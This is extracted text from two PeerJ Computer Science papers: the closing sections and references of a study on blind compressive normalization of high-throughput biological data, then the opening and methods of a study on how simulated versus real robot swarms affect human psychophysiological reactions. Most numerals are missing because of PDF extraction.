pairs of correlated features or samples) are recoverable up to a certain degree. in addition, we provide a comparison with k-sparse recovery for an identical setup, where redundancy and estimation accuracy are modeled as additive noise in y (see fig. b) and shuffled measurement operator a (see fig. d). both approaches perform well in the robustness evaluation, but it is difficult to align their scales for quantitative comparison. benchmarking in order to benchmark the developed blind recovery approach we mimic a standard research problem involving high-throughput data and compare to a widely used unsupervised normalization approach. the aim is to identify differentially expressed genes under different noise conditions at a given significance level (p= . ). for this purpose a high-throughput database is simulated as in ‘simulation’ (see data availability). it contains samples with measured genes (features) each and two groups of replicates that are used to determine differential expression by a standard t-test. we force accurate estimation of correlations and corresponding standard deviations, as the small database size yields poor estimates that cause the recovery to be unstable for the limited number of available measurements (see figs. a, c). the benchmark is performed across different noise conditions: random ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. figure robustness of blind and -sparse recovery. (a, b) as redundancy increases from weak (ρ = . ) to strong (ρ= . ) less measurements are required to blindly recover the low-rank bias (rank- , × ). (c, d) as the accuracy of estimating signal redundancies from the confounded observations increases, the measurements required to blindly recover the low-rank bias (rank- , × ) are reduced. the cor- responding -sparse recovery is simulated for additive noise in y or shuffling in a to mimic the effect of varying redundancy and estimation accuracy for the non-blind case. full-size doi: . /peerjcs. /fig- noise derived from n( , ), systematic noise with rank- as outlined in ‘simulation’ and no noise (see table ). in the case of random noise, both approaches perform similarly and are unable to reverse the effect of the corruption through normalization. thus, no differentially expressed genes are detected at the given significance level (p= . ), which is expected. in the case of systematic noise, the blind compressive normalization (bcn) approach outperforms quantile normalization (qn) and is able to detect differential expression given the accurate estimation of correlations and corresponding standard deviations. in the case of no ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://doi.org/ . /peerjcs. /fig- http://dx.doi.org/ . /peerj-cs. table comparison of blind compressive normalization (bcn) with quantile normalization (qn) and no correction (nc) of the corrupted data. data was corrupted with random, systematic and no noise. a t-test is performed between two groups of replicates (five each) for all genes ( in total) and the result- ing p-values are averaged. plus (+) and minus (−) denote if the avg. p-value falls below the significance level of . , where the expected avg. p-value for no noise and no correction is . e– . bcn (avg. p-value) qn (avg. p-value) nc (avg. p-value) random noise − . e– − . e– − . e– systematic noise + . e– − . e– − . e– no noise + . e– + . e– + . e– noise, no correction (nc) performs best, followed by the qn and bcn approach. both approaches are able to detect differentially expressed genes for the case of no noise. overall, this benchmark shows that the developed approach can outperform existing approaches on a standard research problem under idealized conditions. discussion a key aspect of the proposed algorithm for blind normalization of high-throughput databases is the sparsity assumption (see introduction). by assuming that bias has a sparse structure, due to a limited number of confounding factors, the recovery problem becomes manageable and efficient optimization on manifolds can be used for recovery. the larger a high-throughput database is in size, the more effectively we can leverage the associated redundancies, since we can focus on correlations estimated with high-specificity and low-sensitivity. this is critical, as blind recovery requires a sufficient number of accurately estimated correlations. in addition, spike-in controls can provide further constraints on the bias to be recovered. these can be important sources of additional information to be leveraged by our approach, as integration through additional measurements via entry sensing is straight forward (see ‘k-sparse recovery’). but, it remains an open question how such absolute and relative constraints interact when solving the bias recovery problem (see definition ). for the sparsity assumption to be of use for blind normalization, two further assumptions must be satisfied. sufficient redundancies are needed in the form of correlations found in the high-throughput database at hand. this assumption is generally satisfied, since complex systems under study, such as the cell, generally display a number of strong correlations that are detectable despite the effect of confounding factors. in addition, high-throughput databases of a certain size are likely to contain redundancies in the form of similar biological samples that can be leveraged. finally, blind normalization is only possible if the detected correlations are sufficiently incoherent with the low-dimensional bias model. the likelihood of such incoherence is maximized if correlated features and samples exhibit standard deviations similar to those drawn from a normal distribution, such as in the presented case of k-sparse recovery (see ‘k-sparse recovery’). in the setting of blind recovery, this assumption may only be satisfied for features and not for samples, as correlated samples have generally similar standard deviations. however, when evaluating ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. recovery performance in simulation this does not appear to play a major role (see figs. – ). a theoretical investigation of worst case performance and recovery guarantees is still outstanding, but recent work in the field of blind deconvolution and compressed sensing is in active pursuing this question (stöger, jung & krahmer, ). to scale the developed algorithm to current public high-throughput databases with features and samples on the order of hundred thousands respectively, the memory consumption of the underlying manifold optimization routines needs to be optimized to be efficient on the scale of gigabytes. however, the manifold optimization routines leveraged in our proof-of-concept implementation are not able to exploit the advantages that come with sparse measurement operators, e.g., a low-memory footprint. this is due to the use of conjugate gradient methods that rely on automatic differentiation (maclaurin, duvenaud & adams, ) and require the use of memory inefficient dense matrices. the current implementation is thus only able to handle databases on the order of hundreds of features and samples respectively. hence, an application outside of the scope of the conducted simulations is currently not feasible and should be addressed in future work. however, there appears to be no theoretical limitation that would preclude the development of a memory efficient implementation. this is important, since the proposed approach increases in effectiveness as database size grows and thereby allows the leveraging of more redundancies (see fig. b). an additional challenge exists when using fixed rank constraints in matrix recovery problems, as is the case for the employed manifold optimization routines. the fixed rank of the to be recovered low-rank matrix is generally not known a priori. thus, optimization routines need to be run multiple times for different rank parameters in order to determine the optimal rank. this is an inefficient scheme when contrasted to recovery methods based on nuclear norm regularization (mazumder, hastie & tibshirani, ). furthermore, inappropriate choices of the rank parameter can result in ill-conditioned matrices for which manifold optimization routines may converge slowly. to address these challenges, a pursuit type scheme has been developed recently that can be understood as a warm start technique (tan et al., ). conclusion blind compressive normalization is a systematic approach to the blind normalization of unknown confounding factors in public high-throughput databases. the presented proof-of-concept shows that such an approach is possible under reasonable assumptions. further work in this direction has the potential to address long standing challenges in high-throughput data integration that are becoming increasingly important. acknowledgements we thank bence mélykúti for comments that improved the manuscript. melanie boerries and hauke bush are designated equal last authors due to a shared research group at the time of this work. ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /peerj-cs. additional information and declarations funding this work was supported by lungsys (bmbf # g) and gerontosys (bmbf # d). hauke busch was supported through the dfg excellence cluster exc . the funders had no role in study design, data collection and analysis, decision to publish, or preparation of the manuscript. grant disclosures the following grant information was disclosed by the authors: lungsys: bmbf # g. gerontosys: bmbf # d. dfg excellence cluster: exc . competing interests the authors declare there are no competing interests. author contributions • sebastian ohse conceived and designed the experiments, performed the experiments, analyzed the data, prepared figures and/or tables, performed the computation work, authored or reviewed drafts of the paper, approved the final draft. • melanie boerries and hauke busch analyzed the data, contributed reagents/materials/- analysis tools, authored or reviewed drafts of the paper, approved the final draft. data availability the following information was supplied regarding data availability: source code is available at github: https://github.com/a ec /bcn. supplemental data is available at https://github.com/a ec /bcn/blob/master/ resource/supplementary_data.zip. references allen gi, tibshirani r. . inference with transposable data: modelling the effects of row and column correlations. journal of the royal statistical society: series b (statistical methodology) ( ): – doi . /j. - . . .x. barrett t, wilhite se, ledoux p, evangelista c, kim if, tomashevsky m, mar- shall ka, phillippy kh, sherman pm, holko m, yefanov a, lee h, zhang n, robertson cl, serova n, davis s, soboleva a. . ncbi geo: archive for functional genomics data sets—update. nucleic acids research (d ):d –d doi . /nar/gks . benito m, parker j, du q, wu j, xiang d, perou cm, marron js. . adjust- ment of systematic microarray data biases. bioinformatics ( ): – doi . /bioinformatics/btg . ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com https://github.com/a ec /bcn https://github.com/a ec /bcn/blob/master/resource/supplementary_data.zip https://github.com/a ec /bcn/blob/master/resource/supplementary_data.zip http://dx.doi.org/ . /j. - . . .x http://dx.doi.org/ . /nar/gks http://dx.doi.org/ . /bioinformatics/btg http://dx.doi.org/ . /peerj-cs. bolstad bm, irizarry ra, Åstrand m, speed tp. . a comparison of normalization methods for high density oligonucleotide array data based on variance and bias. bioinformatics ( ): – doi . /bioinformatics/ . . . cai tt, zhang a. . rop: matrix recovery via rank-one projections. the annals of statistics ( ): – doi . / -aos . candes ej, plan y. . matrix completion with noise. proceedings of the ieee ( ): – doi . /jproc. . . candes ej, plan y. . tight oracle inequalities for low-rank matrix recovery from a minimal number of noisy random measurements. ieee transactions on information theory ( ): – doi . /tit. . . candès ej, wakin mb. . an introduction to compressive sampling. ieee signal processing magazine ( ): – doi . /msp. . . cheadle c, vawter mp, freed wj, becker kg. . analysis of microarray data using z score transformation. the journal of molecular diagnostics ( ): – doi . /s - ( ) - . friedman j, hastie t, tibshirani r. . the elements of statistical learning. springer series in statistics, vol. . berlin: springer. hastie t, tibshirani r, wainwright m. . statistical learning with sparsity: the lasso and generalizations. boca raton: crc press. haug k, salek rm, conesa p, hastings j, de matos p, rijnbeek m, mahendraker t, williams m, neumann s, rocca-serra p, maguire e, gonzález-beltrán a, sansone s-a, griffin jl, steinbeck c. . metabolights—an open-access general-purpose repository for metabolomics studies and associated meta-data. nucleic acids research :d –d . huber w, von heydebreck a, sültmann h., poustka a, vingron m. . vari- ance stabilization applied to microarray data calibration and to the quan- tification of differential expression. bioinformatics (suppl ):s –s doi . /bioinformatics/ .suppl_ .s . irizarry ra, bolstad bm, collin f, cope lm, hobbs b, speed tp. . summaries of affymetrix genechip probe level data. nucleic acids research ( ):e –e . jain p, netrapalli p, sanghavi s. . low-rank matrix completion using alternating minimization. in: proceedings of the forty-fifth annual acm symposium on theory of computing. acm, – . johnson we, li c, rabinovic a. . adjusting batch effects in microarray expression data using empirical bayes methods. biostatistics ( ): – doi . /biostatistics/kxj . joyce ar, palsson bØ. . the model organism as a system: integrating’omics’ data sets. nature reviews molecular cell biology ( ): – doi . /nrm . lazar c, meganck s, taminau j, steenhoff d, coletta a, molter c, weiss-solís dy, duque r, bersini h, nowé a. . batch effect removal methods for microarray gene expression data integration: a survey. briefings in bioinformatics : – . li c, wong wh. . model-based analysis of oligonucleotide arrays: model validation, design issues and standard error application. genome biology ( ): . – . . ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /bioinformatics/ . . http://dx.doi.org/ . / -aos http://dx.doi.org/ . /jproc. . http://dx.doi.org/ . /tit. . http://dx.doi.org/ . /msp. . http://dx.doi.org/ . /s - ( ) - http://dx.doi.org/ . /bioinformatics/ .suppl_ .s http://dx.doi.org/ . /biostatistics/kxj http://dx.doi.org/ . /nrm http://dx.doi.org/ . /peerj-cs. lovén j, orlando da, sigova aa, lin cy, rahl pb, burge cb, levens dl, lee ti, young ra. . revisiting global gene expression analysis. cell ( ): – doi . /j.cell. . . . maclaurin d, duvenaud d, adams rp. . autograd: effortless gradients in numpy. in: icml automl workshop. mazumder r, hastie t, tibshirani r. . spectral regularization algorithms for learning large incomplete matrices. journal of machine learning research (aug): – . mccall mn, uppal k, jaffee ha, zilliox mj, irizarry ra. . the gene expres- sion barcode: leveraging public data repositories to begin cataloging the human and murine transcriptomes. nucleic acids research (suppl ):d –d doi . /nar/gkq . montgomery dc. . design and analysis of experiments. new york: john wiley & sons. parker hs, corrada bravo h, leek jt. . removing batch effects for prediction prob- lems with frozen surrogate variable analysis. peerj :e doi . /peerj. . seita j, sahoo d, rossi dj, bhattacharya d, serwold t, inlay ma, ehrlich li, fathman jw, dill dl, weissman il. . gene expression commons: an open platform for absolute gene expression profiling. plos one ( ):e doi . /journal.pone. . stöger d, jung p, krahmer f. . blind deconvolution and compressed sensing. in: compressed sensing theory and its applications to radar, sonar and remote sensing (cosera), th international workshop on. ieee, – . tan m, tsang iw, wang l, vandereycken b, pan sj. . riemannian pursuit for big matrix recovery. in: icml, vol. . beijing: jmlr.org, – . available at http://dl.acm.org/citation.cfm?id= . . townsend j, koep n, weichwald s. . pymanopt: a python toolbox for optimization on manifolds using automatic differentiation. journal of machine learning research ( ): – . vandereycken b. . low-rank matrix completion by riemannian optimization. siam journal on optimization ( ): – doi . / . vizcaíno ja, csordas a, del toro n, dianes ja, griss j, lavidas i, mayer g, perez- riverol y, reisinger f, ternent t, xu q-w, wang r, hermjakob h. . update of the pride database and its related tools. nucleic acids research (d ):d –d doi . /nar/gkv . wagner a, zuk o. . low-rank matrix recovery from row-and-column affine measurements. arxiv preprint. arxiv: . . wei k, cai j-f, chan tf, leung s. . guarantees of riemannian optimization for low rank matrix recovery. siam journal on matrix analysis and applications ( ): – doi . / m . zhong k, jain p, dhillon is. . efficient matrix sensing using rank- gaussian measurements. in: international conference on algorithmic learning theory. berlin: springer, – . ohse et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://peerj.com http://dx.doi.org/ . /j.cell. . . http://dx.doi.org/ . /nar/gkq http://dx.doi.org/ . /peerj. http://dx.doi.org/ . /journal.pone. http://dl.acm.org/citation.cfm?id= . http://dx.doi.org/ . / http://dx.doi.org/ . /nar/gkv http://arxiv.org/abs/ . http://dx.doi.org/ . / m http://dx.doi.org/ . /peerj-cs. investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction gaëtan podevijn , rehan o’grady , carole fantini-hauwel and marco dorigo iridia, université libre de bruxelles, belgium research center of clinical psychology, psychopathology and psychosomatic, université libre de bruxelles, belgium abstract the reality gap is the discrepancy between simulation and reality—the same behavioural algorithm results in different robot swarm behaviours in simulation and in reality (with real robots). in this paper, we study the effect of the reality gap on the psychophysiological reactions of humans interacting with a robot swarm. we compare the psychophysiological reactions of participants interacting with a simulated robot swarm and with a real (non-simulated) robot swarm. our results show that a real robot swarm provokes stronger reactions in our participants than a simulated robot swarm. we also investigate how to mitigate the effect of the reality gap (i.e., how to diminish the difference in the psychophysiological reactions between reality and simulation) by comparing psychophysiological reactions in simulation displayed on a computer screen and psychophysiological reactions in simulation displayed in virtual reality. our results show that our participants tend to have stronger psychophysiological reactions in simulation displayed in virtual reality (suggesting a potential way of diminishing the effect of the reality gap). subjects human-computer interaction, adaptive and self-organizing systems, agents and multi-agent systems, artificial intelligence, robotics keywords swarm robotics, human-swarm interaction, psychophysiology, reality gap introduction in a near future, swarms of autonomous robots are likely to be part of our daily life. whether swarms of robots will be used for high-risk tasks (e.g., search and rescue, demining) or for laborious tasks (e.g., harvesting, environment cleaning, grass mowing) (dorigo, birattari & brambilla, , dorigo et al., ), it will be vital for humans to interact with these robot swarms (e.g., supervise, issue commands or receive feedback). recently, human-swarm interaction has become an active field of research. more and more, researchers in human-swarm interaction validate their work by performing user studies (i.e., group of human participants performing an experiment of human-swarm interaction). however, a large majority of the existing user studies are performed exclusively in simulation, with human operators interacting with simulated robots on a computer screen (e.g., bashyal & venayagamoorthy, ; nunnally et al., ; de la croix & egerstedt, ; walker et al., ; kolling et al., ; walker et al., ; pendleton & goodrich, ; nagavalli et al., ). how to cite this article podevijn et al. ( ), investigating the effect of the reality gap on the human psychophysiological state in the context of human-swarm interaction. peerj comput. sci. :e ; doi . /peerj-cs. submitted april accepted august published september corresponding author gaëtan podevijn, gpodevij@ulb.ac.be academic editor jason jung additional information and declarations can be found on page doi . /peerj-cs. copyright podevijn et al. distributed under creative commons cc-by . http://dx.doi.org/ . /peerj-cs. mailto:gpodevij@�ulb.�ac.�be https://peerj.com/academic-boards/editors/ https://peerj.com/academic-boards/editors/ http://dx.doi.org/ . /peerj-cs. http://www.creativecommons.org/licenses/by/ . / http://www.creativecommons.org/licenses/by/ . / https://peerj.com/computer-science/ simulation is a convenient choice for swarm roboticists, as it allows experimental conditions to be replicated perfectly in different experimental runs. even more importantly, gathering enough real robots to make a meaningful swarm is often prohibitively expensive in terms of both money and time. however, conducting user studies in simulation suffers from a potentially fundamental problem—the inherent discrepancy between simulation and the reality (henceforth referred to as the reality gap). in this paper, we study the effect of the reality gap on human psychology. understanding the psychological impact of any interactive system (be it human-computer interaction, human-robot interaction or human-swarm interaction) on its human operator is clearly essential to the development of an effective interactive system (carroll, ). to date, it is not yet clear what the effect of the reality gap is on human psychology in human-swarm interaction studies. our goal is to study this effect. we present an experiment in which humans interact with a simulated robot swarm displayed on a computer screen, with a simulated robot swarm displayed in virtual reality (within a virtual reality headset) and with a real (i.e., non-simulated) robot swarm (see fig. ). in our experimental setup, our goal was to produce results that were as objective as possible. to this end, we firstly recorded psychological impact using psychophysiological measures (e.g., heart-rate, skin conductance), which are considered more objective than purely questionnaire-based methods (bethel et al., ). secondly, we made purely passive the interaction of our human operators with the robot swarm. in this purely passive interaction, our participants do not issue any commands to, nor receive any feedback from the robot swarm. finally, we decided that our participants would interact with a robot swarm executing a simple random walk behaviour (compared to a more complex foraging behaviour, for instance). these two choices allow us to isolate the reality gap effect. the passive interaction reduces the risk that psychophysiological reactions to the interaction interface (e.g., joystick, keyboard, voice commands) would be the strongest measurable reaction, drowning out the difference in reaction to the reality gap. the choice of a simple random walk behaviour reduces the risk that any psychophysiological reactions are caused by reactions to artefacts of a complex swarm robotics behaviour. our results show that our participants have stronger psychophysiological reactions when they interact with a real robot swarm than when they interact with a simulated robot figure example of an experiment. (a) a participant interacts with a swarm made up of real robots. (b) a participant is attached to a virtual reality head set and interacts with a simulated swarm of robots. (c) a participant interacts with a simulated swarm of robots displayed on a computer screen. the participant shown in this figure is the first author of this paper and did not take part in the experiment. the pictures shown in this figure were taken for illustration purpose. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ swarm (either displayed on a computer screen or in a virtual reality headset). our results also show that our participants reported a stronger level of psychological arousal when they interacted with a robot swarm simulated in a virtual reality headset than when they interacted with a robot swarm simulated on a computer screen (suggesting that virtual reality is a technology that could potentially mitigate the effect of the reality gap in human-swarm interaction user studies). we believe the results we present here should have a significant impact on best-practices for the future human-swarm interaction design and test methodologies. related literature human-swarm interaction, the field of research that studies how human beings can interact with swarm of autonomous robots, is getting more and more attention. some research focuses on more technical aspects, such as control methods (direct control of the robots, or indirect control of the robots) (kolling et al., ), the effect of neglect benevolence (determining the best moment to issue a command to a swarm) (walker et al., ; nagavalli et al., ), the interaction based on gestures (podevijn et al., ; nagi et al., , nagi et al., ) or the effect of bandwidth limitation during the interaction (nunnally et al., ). these examples do not constitute an exhaustive review of the literature. for a more comprehensive survey, we refer the reader to kolling et al. ( ). to date, however, very little research in the human-swarm interaction literature has focused on the psychology of humans interacting with robot swarms. de la croix & egerstedt ( ) studied the effect of communication network topologies (made by the robots) on humans. the authors found that when humans control a swarm of robots, certain types of topologies increased the workload. walker et al. ( ) and amraii et al. ( ) investigated the effect of two command propagation methods (i.e., methods to propagate a command issued by a human being to all the robots of a swarm) when a human operator guides a leader robot (i.e., a single robot). in their work, a human operator guides the leader robot by changing the leader robot’s velocity and heading through a graphical interface. they compared the flooding propagation method to the consensus propagation method. in the flooding propagation method, the robots of the swarm controlled by a human operator all set their velocity and heading to the leader robot’s velocity and heading. in the consensus propagation method, the robots of the swarm all set their velocity and heading to the average velocity and heading of their neighbors. the authors showed that the humans’ workload is lower in the flooding propagation method than in the consensus propagation method. setter et al. ( ) studied the humans’ workload level when a human being guides a robot swarm with an haptic control device (i.e., a device allowing a human to guide the robots and to receive haptic feedback from the robots). pendleton & goodrich ( ) studied the effect of the robot swarm size (i.e., the number of robots in a swarm) on the human workload level. they conducted an experiment in which participants had to guide swarms of , and simulated robots. they found that human workload is not dependent on the number of robots when interacting with a robot swarm. podevijn et al. ( ) studied the podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ effect of the robot swarm size on the human psychophysiological state. they found that higher robot swarm sizes provoke stronger psychophysiological responses. with the exception of setter et al. ( ) and podevijn et al. ( ), all the works that study the psychology of humans interacting with a robot swarm are performed in simulation only. due to the inherent existence of the reality gap, though, it is not clear if human-swarm interaction studies performed in simulation only would provoke the same psychological reactions as the same human-swarm interaction studies performed with a robot swarm made up of real robots. the question of the psychological reaction differences when humans interact with a real robot or with a simulated robot has been already addressed in the research field of social robotics. in social robotics, the goal of the robot designers is for the robot to socially interact with humans (hegel et al., ). most of the works that address the question of the humans’ psychological reaction differences between the interaction with real robots and simulated robots in social robotics tend to show that humans prefer to interact with a real robot than with a simulated robot. in the following research, all authors used a measure of “enjoyment.” the enjoyment is assessed either by a self-developed questionnaire, or by following the game flow model (a model developed to evaluate player enjoyment in games (sweetser & wyeth, )). when a robot provides humans with help and instructions on a given task, kidd & breazeal ( ), wainer et al. ( ) and fasola & matari�c ( ) all reported that humans had a more enjoyable experience (assessed by a self-developed questionnaire) with a real robot compared to a simulated robot. pereira et al. ( ) and leite et al. ( ) also show that humans had a more enjoyable experience with a real robot than with a simulated robot when their participants were playing chess against the robot (both assessed by the game flow model). in powers et al. ( ), the participants of the authors’ study conversed with a real robot and with a simulated robots about health habits. the results of the study revealed that their participants reported to have a more enjoyable conversation with the real robot than with the simulated robot (assessed by a self-developed questionnaire). wrobel et al. ( ) performed an experiment in which elder participants play a card game against a computer, a real robot and a simulated robot. in their results, their participants reported more joy playing against the computer than against the real robot or the simulated robot. however, their participants had a more enjoyable experience playing against the real robot than against the simulated robot (assessed by the game flow model). for a more comprehensive survey about the psychological differences when humans interact with real robots and simulated robots, we refer the reader to li ( ). our work is different from the existing body of research in human-robot interaction because the interaction between humans and robot swarms is inherently different from the interaction between humans and a single robot. this difference is firstly due to the relative simplicity of the robots used in swarm robotics. robots used in swarm robotics are not equipped with dedicated communication hardware (such as speech- based or text-based communication). even if they were equipped with dedicated communication hardware, it would be overwhelming—due to the large number of robots— for a human operator to send data (e.g., commands) to and receive data (e.g., feedback) podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ from each individual robot. a second reason for the difference is that there is no social interaction between human beings and robot swarms. in this paper, we study the differences in psychological reactions when a human being passively interacts with a real robot swarm, with a simulated robot swarm displayed in a virtual reality environment, and with a simulated robot swarm displayed on a computer screen. moreover, while all of the aforementioned social robotic works only use dedicated psychological questionnaires to study the participants’ psychological reactions, we use a combination of psychological questionnaire and physiological measures in order to study the psychophysiological reactions of participants interacting with a robot swarm. methodology hypotheses a review of the human-swarm interaction literature reveals that the majority of the user experiments are performed in simulation. we believe that conducting a human-swarm interaction experiment in simulation can lead to different results than if the same experiment was conducted with real robots. a reason for the results to be different in simulation and in reality is the inherent presence of the reality gap. it is not always possible, however, to perform a human-swarm interaction with real robots (e.g., because an experiment requires a large number of robots). it is our vision that the effects of the reality gap in simulation should be mitigated as much as possible. in order to mitigate the effects of the reality gap, we propose to use virtual reality for simulating the robot swarm. we based the experiment of this paper on these two hypotheses: � the psychophysiological reactions of humans are stronger when they interact with a real robot swarm than when they interact with a simulated robot swarm. � the psychophysiological reactions of humans are stronger when they interact with a simulated robot swarm displayed in virtual reality than when they interact with a simulated robot swarm displayed on a computer screen. confirming the first hypothesis would imply that human-swarm interaction experiments should be done with real robots instead of simulation. confirming the second hypothesis would imply that in order to mitigate the effect of the reality gap (if it is not possible to use real robots), it is better for a researcher to simulate a robot swarm in virtual reality because it provokes in humans more realistic psychophysiological reactions compared to simulated robots displayed on a computer screen. experimental scenario we designed an experimental scenario that allowed us to study the effect of the reality gap on humans in the context of human-swarm interaction. to study the effect of the reality gap, we divided our experimental scenario into three sessions. the order of the three sessions was randomly assigned to our participants. in each session, a participant has to supervise (i.e., watch attentively) a swarm made up of robots. in the so-called real robots session, the participant supervises a real (i.e., non-simulated) swarm of robots podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ (see fig. a). in the screen simulation session, the participant supervises a simulated swarm of robots displayed on a computer screen. in this session, the robot swarm is visible to the participant from the top view (see fig. b). in the virtual reality session, the participant supervises a simulated swarm of robots displayed in a virtual reality environment. the participant wears a virtual reality headset (i.e., a smartphone put in a google virtual reality cardboard (https://www.google.com/get/cardboard) and is immersed in a d virtual world in which simulated robots are present (see fig. c). during the three sessions (i.e., real robots, screen simulation, virtual reality), the participant has to supervise the robots for a period of s. measures we used two types of measures: self-reported measures and psychophysiological measures. we use self-reported measures (i.e., data gathered from our participants using a dedicated psychological questionnaire) to determine whether our participants are subjectively conscious of their psychophysiological reaction changes and whether these reaction changes are positive (i.e., our participants report to have a positive experience) or negative (i.e., our participants report to have a negative experience). we use psychophysiological measures, on the other hand, to determine objectively the psychological state of our participants based on physiological responses. these psychophysiological measures are considered objective because it is difficult for humans to intentionally manipulate their physiological responses (for instance to intentionally decrease heart rate). in the following two sections, we first present the self-reported measures used in this study. then, we present the psychophysiological measures. self-reported measure in this study, we collect our participants’ self-reported affective state. we measure our participants’ affective state with two scales: valence and arousal. valence is the cognitive judgement (i.e., pleasure or displeasure) of an evaluation such as the interaction with robots considered in this study. higher valence values correspond to greater pleasure, while lower valence values correspond to a less pleasurable experience. the arousal scale assesses the mental alertness and the level of physical activity or level of excitation (mehrabian, ) felt during an evaluation. figure robots and environments for each of the three sessions. (a) view of the real robots and environment. the view is displayed from the participant’s perspective. (b) top view of the robots and of the environment simulated on a computer and displayed on a screen. (c) view of the robots and of the environment simulated in virtual reality. the view is displayed from the participant’s perspective. podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / https://www.google.com/get/cardboard http://dx.doi.org/ . /peerj-cs. https://peerj.com/ we developed an open source electronic version of the self-assessment manikin (sam) questionnaire (lang, ). this electronic version of the sam questionnaire runs on a tablet device. the sam questionnaire represents the values of the arousal scale and of the valence scale with a picture. in this version of the sam questionnaire, each scale is composed of nine values represented by five pictures and four inter-points between each of the five pictures (i.e., a value of the scale that is not represented by a picture). the tablet application displays the scales in a vertical arrangement where the top-most picture represents the lowest level of the scale (e.g., lowest level of arousal), and the bottom-most picture represents the highest level of the scale (e.g., highest level of arousal). each picture and each inter-point are associated with a numerical score. numerical scores vary from to . in the valence scale, corresponds to the lowest level of valence (i.e., pleasure is minimal) and corresponds to the highest level of valence (i.e., pleasure is maximal). in the arousal scale, corresponds to the lowest level of arousal (i.e., excitement is minimal) and corresponds to the highest level of arousal (i.e., excitement is maximal). fig. shows a screen-shot of the sam questionnaire running on a tablet device. psychophysiological measure physiological responses can be used to study the human psychophysiological state (e.g., emotional state or cognitive state). physiological responses are activated by the autonomic nervous system. the autonomic nervous system is divided into the sympathetic nervous system and the parasympathetic nervous system. the sympathetic nervous system is considered to be responsible for the activation of the fight-or-flight physiological responses (i.e., physiological responses in case of stress). the parasympathetic nervous system, on the other hand, is considered to be responsible for maintaining physiological responses to a normal activity (i.e., the physiological responses at rest). the electrodermal activity (i.e., the skin’s electrical activity) and the cardiovascular activity are two common physiological activities used in the literature to study the autonomic nervous system. in this research, we study our participants’ electrodermal activity by monitoring their skin conductance level (scl) and we study our participants’ cardiovascular activity by monitoring their heart rate. the scl is a slow variation of the skin conductance over time and is measured in microsiemens (ms). an increase of the scl is only due to an increase of the sympathetic nervous system activity. it is, therefore, a measure of choice to study the human fight-or- flight response. scl has also been correlated to the affective state’s arousal (boucsein, ). the heart rate is the number of heart beats per unit of time. it is usually measured in beats per minute (bpm). unlike the scl though, variation of the heart rate can not be unequivocally associated with a variation of the sympathetic nervous system only. heart rate can vary due to either a variation of the sympathetic nervous system, a variation of the parasympathetic nervous system, or a combination of both (cacioppo, tassinary & berntson, ). heart rate activity is, therefore, more difficult to analyse and interpret than the scl. because the physiological responses can vary between individuals, it is difficult to compare the physiological responses of an individual with those of another. in order podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ figure electronic version of the self-assessment manikin questionnaire. (a) the valence scale. the top-most picture corresponds to the lowest level of valence. the bottom-most picture corresponds to the highest level of valence. (b) the arousal scale. the top-most picture corresponds to the lowest level of arousal. the bottom-most picture corresponds to the highest level of arousal. the pictures used in the application are taken from and available at http://www.pxlab.de (last access: april ). podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://www.pxlab.de http://dx.doi.org/ . /peerj-cs. https://peerj.com/ to compare the physiological responses between our participants, we first recorded our participants’ physiological responses at rest (i.e., the baseline), then we recorded our participants’ physiological responses during the experiment. in our statistical analyses, we use the difference between our participants’ physiological responses at rest and during the experiment. equipment and experimental setup physiological response acquisition we monitored our participants’ physiological responses with a powerlab t (adinstruments) data acquisition system augmented with a gsr amp device. the powerlab t was connected via usb to a laptop computer running mac osx yosemite. we used the software labchart to record the physiological responses acquired by the powerlab t data acquisition system. we used an infrared photoelectric sensor (i.e., a photopletismograph) to measure the blood volume pulse (bvp) of our participants (i.e., changes in the pulsatile blood flow). the blood volume pulse can be retrieved from the photopletismograph from the peripheral parts of the human body such as on the fingers. we can compute the heart rate from the blood volume pulse. firstly, we calculate the inter-beat interval (ibi) (i.e., time in seconds between two peaks in the blood volume pulse). then, we calculate the heart rate by dividing by the ibi. for instance, if the ibi of an individual is s, this individual’s heart rate is bpm. fig. a shows the blood volume pulse of a participant during a time window of s. the photopletismograph was attached to the index finger of a participants dominant hand. the photopletismograph was directly connected to the powerlab t. to monitor the electrodermal activity of our participants, we used brightly polished stainless steel bipolar electrodes connected to the gsr amp device. these bipolar electrodes were attached to the medial phalanxes of the index and middle fingers of a participants non-dominant hand. in order to monitor the skin conductance, the gsr amp device applies a direct constant voltage between the bipolar electrodes. the constant voltage is small enough (i.e., mv) to prevent the participants from feeling it. as the voltage is known and constant ( mv), the gsr amp device can measure the current between the bipolar electrodes. when the current is known, the gsr amp device can calculate the conductance of the skin by applying the ohm’s law (conductance is the current measured between the electrodes divided by the constant voltage applied by the gsr amp device between the electrodes). fig. b shows the skin conductance of a participant during a time window of s. environment and robot behaviour in all of the three sessions of our experimental scenario (i.e., real robots, virtual reality, screen simulation), we used a square environment of dimension � m. fig. shows the environment of each of the three sessions. at the beginning of each session, robots are randomly placed in the environment. when an experiment starts, the robots perform a random walk with obstacle avoidance behaviour for a period of s. each robot executes the two following steps: i) it drives straight with a constant velocity of cm/s, podevijn et al. ( ), peerj comput. sci., doi . /peerj-cs. / http://dx.doi.org/ . /peerj-cs. https://peerj.com/ and ii) it changes its direction when it encounters either a robot or an 